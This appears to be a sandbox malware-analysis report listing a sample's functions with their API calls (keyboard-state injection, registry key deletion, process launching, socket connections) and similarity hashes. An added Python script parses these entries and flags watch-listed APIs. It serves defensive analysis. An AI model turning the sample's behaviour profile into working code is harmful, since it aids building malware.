                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 822c743c3342bc459269f6305d821b4440673c290b7f7f255f69dcbb5ca0b767
                                                    • Instruction ID: 5fbd7ff7b3bd474f7656fc2fa5a324253949f200e5455673c3d17a9a5758d7e1
                                                    • Opcode Fuzzy Hash: 822c743c3342bc459269f6305d821b4440673c290b7f7f255f69dcbb5ca0b767
                                                    • Instruction Fuzzy Hash: 1F715070940109EFCB09DF54CC85AFFBBB6FF86314F148159F915AA291C7349A51CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08be14bcbf035a5a0cc6b8435d24410e9bd0851d64b214381cb20e41570e6000
                                                    • Instruction ID: 6b04fa3617eacdb30090e14ec09f59d090cbd9bfe3edaf95ea724885a1dae8a7
                                                    • Opcode Fuzzy Hash: 08be14bcbf035a5a0cc6b8435d24410e9bd0851d64b214381cb20e41570e6000
                                                    • Instruction Fuzzy Hash: 2561DE71508300ABD754EB24CC85E6BB7EBAF84714F108A1CF54A972E2DB70AD05CBA6
                                                    APIs
                                                    • IsWindow.USER32(01315678), ref: 0068B6A5
                                                    • IsWindowEnabled.USER32(01315678), ref: 0068B6B1
                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068B795
                                                    • SendMessageW.USER32(01315678,000000B0,?,?), ref: 0068B7CC
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0068B809
                                                    • GetWindowLongW.USER32(01315678,000000EC), ref: 0068B82B
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068B843
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: a4141f3f2d42a8838e3c8d7bc9906bac5965394ee77c973dfce7bb75f73e7fa8
                                                    • Instruction ID: c372ca8bf326b6fc4aa53fd4d05fb3cb897284ed85e394f5a6a5beb9a1398c8b
                                                    • Opcode Fuzzy Hash: a4141f3f2d42a8838e3c8d7bc9906bac5965394ee77c973dfce7bb75f73e7fa8
                                                    • Instruction Fuzzy Hash: D3718E34640304AFDB24AF64C894FFA7BBBEF89300F146669F94697361D731A881CB54
                                                    APIs
                                                    • _memset.LIBCMT ref: 0067F75C
                                                    • _memset.LIBCMT ref: 0067F825
                                                    • ShellExecuteExW.SHELL32(?), ref: 0067F86A
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • GetProcessId.KERNEL32(00000000), ref: 0067F8E1
                                                    • CloseHandle.KERNEL32(00000000), ref: 0067F910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 095214d948cce3a9e26ac9488e1a037bd4ef05610ab7ed1f9f10b017e24a37ab
                                                    • Instruction ID: 929f0b3ff57d2945104bbc3b0f7646770af23b87c680c61e6d172433e3ebf9bb
                                                    • Opcode Fuzzy Hash: 095214d948cce3a9e26ac9488e1a037bd4ef05610ab7ed1f9f10b017e24a37ab
                                                    • Instruction Fuzzy Hash: B7616D75A00619DFCB18DF98C5819AEBBF6FF48310B14856DE85AAB391CB30AD41CF94
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0066149C
                                                    • GetKeyboardState.USER32(?), ref: 006614B1
                                                    • SetKeyboardState.USER32(?), ref: 00661512
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00661540
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0066155F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006615A5
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006615C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                    • Instruction ID: 11415e93c7e484c89d3de94f35ad18fcea33638e63de2320732675845bad1a53
                                                    • Opcode Fuzzy Hash: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                    • Instruction Fuzzy Hash: 3151D0A0A046D53EFB324634CC45BFABEAB5B47304F0C8589E1D68A9D2C694EC84D7A0
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 006612B5
                                                    • GetKeyboardState.USER32(?), ref: 006612CA
                                                    • SetKeyboardState.USER32(?), ref: 0066132B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00661357
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00661374
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006613B8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006613D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                    • Instruction ID: 421905fc11b38330eb8f1a1fb52c722ce4b769a6fca904d09d5c88159f4dec1f
                                                    • Opcode Fuzzy Hash: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                    • Instruction Fuzzy Hash: D551F3A09047D53DFB3287248C55BBABFAB9B07300F0C8589E1D59EAC2D795AC94E760
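The per-function entries in this listing (the APIs lines with their ref: addresses, the Similarity fields and the fuzzy hashes) are easier to triage by machine than by eye. The Python below is an added example, not Joe Sandbox's code or output: it parses entries in the layout shown above, strips the "Download File" link residue from the Associated lines, decodes the PostMessageW message and virtual-key constants of the two keyboard-state functions above using their standard Win32 values (0x100 WM_KEYDOWN, 0x101 WM_KEYUP, 0x10 VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN), and flags entries that call a watch-listed API directly. The watch-list is an analyst's assumption, not something the report states, and the embedded sample is constructed from three of this page's own entries (the ShellExecuteExW function at 0067F75C, the keyboard-state function at 006612B5, and the RegEnumKeyExW/RegDeleteKeyW function at 0068125C further down), trimmed, with the last one cut off the way the page itself is.

```python
"""Parse Joe Sandbox per-function listings (the 'APIs' / 'Similarity' blocks) and triage
them by the Win32 APIs each function calls. Added example, not part of the report."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
# "• Name.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function X:"
API_RE = re.compile(
    r"^•\s+(?P<sub>Part of subcall function [0-9A-F]+:\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# Standard Win32 constant values, used to decode the PostMessageW calls in the listing
WM_NAMES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
# Assumed watch-list (an analyst's choice, not from the report): APIs worth a second look
SENSITIVE = {
    "RegDeleteKeyW": "deletes registry keys",
    "ShellExecuteExW": "launches another process",
    "SetKeyboardState": "rewrites keyboard state (synthetic input)",
    "GetProcAddress": "resolves imports at run time",
}
Call = namedtuple("Call", "name module args ref subcall")


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_listing(text):
    """Split into entries; each ends at 'Instruction Fuzzy Hash', a truncated last one is kept."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append(Call(m["name"], m["mod"], args, m["ref"], bool(m["sub"])))
            continue
        f = FIELD_RE.match(line)
        if f:
            val = f["val"].removesuffix("Download File").strip()  # drop page link residue
            cur.fields.setdefault(f["key"], []).append(val)
            if f["key"] == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = FunctionEntry()
    if cur.calls or cur.fields:
        entries.append(cur)
    return entries


def decode_key_message(call):
    """For PostMessageW(hwnd, msg, wParam, lParam) name the key event posted, else None."""
    if call.name != "PostMessageW" or len(call.args) < 3:
        return None
    try:
        msg, vk = int(call.args[1], 16), int(call.args[2], 16)
    except ValueError:
        return None
    return f"{WM_NAMES[msg]} {VK_NAMES.get(vk, hex(vk))}" if msg in WM_NAMES else None


def triage(entries):
    """(first ref, API ID, reasons) per entry that calls a watch-listed API directly or posts keys."""
    findings = []
    for e in entries:
        reasons = []
        for c in e.calls:
            if c.name in SENSITIVE and not c.subcall:
                reasons.append(f"{c.name}: {SENSITIVE[c.name]}")
            key = decode_key_message(c)
            if key:
                reasons.append(f"PostMessageW injects {key}")
        if reasons:
            findings.append((e.calls[0].ref, e.fields.get("API ID", [""])[0], reasons))
    return findings


# Constructed sample: three entries copied from the listing and trimmed; the last is cut short.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0067F75C
• ShellExecuteExW.SHELL32(?), ref: 0067F86A
  • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• Instruction Fuzzy Hash: B7616D75A00619DFCB18DF98C5819AEBBF6FF48310B14856DE85AAB391CB30AD41CF94
APIs
• SetKeyboardState.USER32(?), ref: 0066132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00661357
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006613D9
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: D551F3A09047D53DFB3287248C55BBABFAB9B07300F0C8589E1D59EAC2D795AC94E760
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0068125C
• RegDeleteKeyW.ADVAPI32(?,?), ref: 006812E0
"""

if __name__ == "__main__":
    print(*triage(parse_listing(SAMPLE)), sep="\n")
```

Subcall lines are parsed but not attributed to the enclosing function, so a function is flagged only for APIs it calls itself; the parsed Similarity fields (API ID, fuzzy hashes) can be carried alongside each finding to match the same function across other samples.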
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 51ca4c019871a2142cb2008dedc7d4f8f6040ad6c52fe3e0bcc67347515f011d
                                                    • Instruction ID: 9363729d310008c3e67f4d7f6bbfc1502bb8c319baf0f43b758350b2e73da4bd
                                                    • Opcode Fuzzy Hash: 51ca4c019871a2142cb2008dedc7d4f8f6040ad6c52fe3e0bcc67347515f011d
                                                    • Instruction Fuzzy Hash: 4841B565C2092476CB50EBF49C869CF73AAAF05310F50895AF515E3221E734E754CBAD
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065DAC5
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0065DAFB
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0065DB0C
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0065DB8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,i$DllGetClassObject
                                                    • API String ID: 753597075-1121700710
                                                    • Opcode ID: 39e6d19a27c2d5f93fea58ef037add4f97ee4b9309d7cddb25fea0956cdd140d
                                                    • Instruction ID: 8ab1e0012fecb7a58d329ef2093ff32c2c697a59f66681ebf8a5a42c8a452271
                                                    • Opcode Fuzzy Hash: 39e6d19a27c2d5f93fea58ef037add4f97ee4b9309d7cddb25fea0956cdd140d
                                                    • Instruction Fuzzy Hash: A34182B1600209EFDB25CF54C884AAA7BBBEF44311F1581ADED059F285D7B1DE48CBA0
                                                    APIs
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006638D3,?), ref: 006648C7
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006638D3,?), ref: 006648E0
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006638F3
                                                    • _wcscmp.LIBCMT ref: 0066390F
                                                    • MoveFileW.KERNEL32(?,?), ref: 00663927
                                                    • _wcscat.LIBCMT ref: 0066396F
                                                    • SHFileOperationW.SHELL32(?), ref: 006639DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: d4d0a2005faaf86bb97fa9488c40b49254d711b05c536632f5d3a8019f0b3c9f
                                                    • Instruction ID: db5ec841cf54afb6337dc5a6d44881da2be88859708bafd9ee2630fb9d8b150a
                                                    • Opcode Fuzzy Hash: d4d0a2005faaf86bb97fa9488c40b49254d711b05c536632f5d3a8019f0b3c9f
                                                    • Instruction Fuzzy Hash: 8D419371508394AED791EF64D4419EFB7E9AF89340F00092EB48AC3251EB75D688CB56
                                                    APIs
                                                    • _memset.LIBCMT ref: 00687519
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006875C0
                                                    • IsMenu.USER32(?), ref: 006875D8
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00687620
                                                    • DrawMenuBar.USER32 ref: 00687633
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: c1f88baf8fbc87214efc38281e0616dad1ef7f8d5c9f88439a3cee0f74af88fa
                                                    • Instruction ID: aec932ce3f03ee857b653739d100c42b01abdb750061f6c7c65df903764da812
                                                    • Opcode Fuzzy Hash: c1f88baf8fbc87214efc38281e0616dad1ef7f8d5c9f88439a3cee0f74af88fa
                                                    • Instruction Fuzzy Hash: 4A41F675A05609AFDB20EF54D884EEABBBAFB04314F148229F955A7350D730ED50CFA1
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0068125C
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00681286
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0068133D
                                                      • Part of subcall function 0068122D: RegCloseKey.ADVAPI32(?), ref: 006812A3
                                                      • Part of subcall function 0068122D: FreeLibrary.KERNEL32(?), ref: 006812F5
                                                      • Part of subcall function 0068122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00681318
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 006812E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 5da77452a78b52d00c089775551a188228bf59b8255b3a0a57b033341e128871
                                                    • Instruction ID: 45c3da39c47c521e72a5d5f4cc23732c77099f68a233c6fb0138e7aecf5e0b80
                                                    • Opcode Fuzzy Hash: 5da77452a78b52d00c089775551a188228bf59b8255b3a0a57b033341e128871
                                                    • Instruction Fuzzy Hash: 28312DB1901109BFDB14AB90DC99EFEB7BDEF09300F10026AE505E6251DA749F869BA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0068655B
                                                    • GetWindowLongW.USER32(01315678,000000F0), ref: 0068658E
                                                    • GetWindowLongW.USER32(01315678,000000F0), ref: 006865C3
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006865F5
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0068661F
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00686630
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0068664A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: d14826cecd9c48d12141e7e609f2eec3f6d9834f355e6be8708bceb11746c723
                                                    • Instruction ID: 7370aed6c02679e79ed22f52ea7900e2c2cef711dfd70c1ad839d08f7156a8fb
                                                    • Opcode Fuzzy Hash: d14826cecd9c48d12141e7e609f2eec3f6d9834f355e6be8708bceb11746c723
                                                    • Instruction Fuzzy Hash: 62310670644150AFDB20DF18DC89FA537E2FB4A710F191268F511DB2B6DB71AC80DB66
                                                    APIs
                                                      • Part of subcall function 006780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006764D9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006764E8
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676521
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 0067652A
                                                    • WSAGetLastError.WSOCK32 ref: 00676534
                                                    • closesocket.WSOCK32(00000000), ref: 0067655D
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676576
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 43100e792f1e9302c856a70dc0cf1a9b545f5613058f05b24b869f1229170f40
                                                    • Instruction ID: 7b0faf73b359939d33887efce0601bab284af3207f4f2c6d526a23d376bd259c
                                                    • Opcode Fuzzy Hash: 43100e792f1e9302c856a70dc0cf1a9b545f5613058f05b24b869f1229170f40
                                                    • Instruction Fuzzy Hash: D031B171600618AFEB10AF24DC85BBE7BBBEB44714F048129FD0997291DB70AD05DBA1
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E0FA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E120
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0065E123
                                                    • SysAllocString.OLEAUT32 ref: 0065E144
                                                    • SysFreeString.OLEAUT32 ref: 0065E14D
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0065E167
                                                    • SysAllocString.OLEAUT32(?), ref: 0065E175
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 143f7c059ef8969242bb38e61a09f0ec4db33ed76f16759488c42454d87e1e7c
                                                    • Instruction ID: 40f92b77895222ab9a36c3dba0ab5a49c699625b87b1f311bb22923354f6dbb9
                                                    • Opcode Fuzzy Hash: 143f7c059ef8969242bb38e61a09f0ec4db33ed76f16759488c42454d87e1e7c
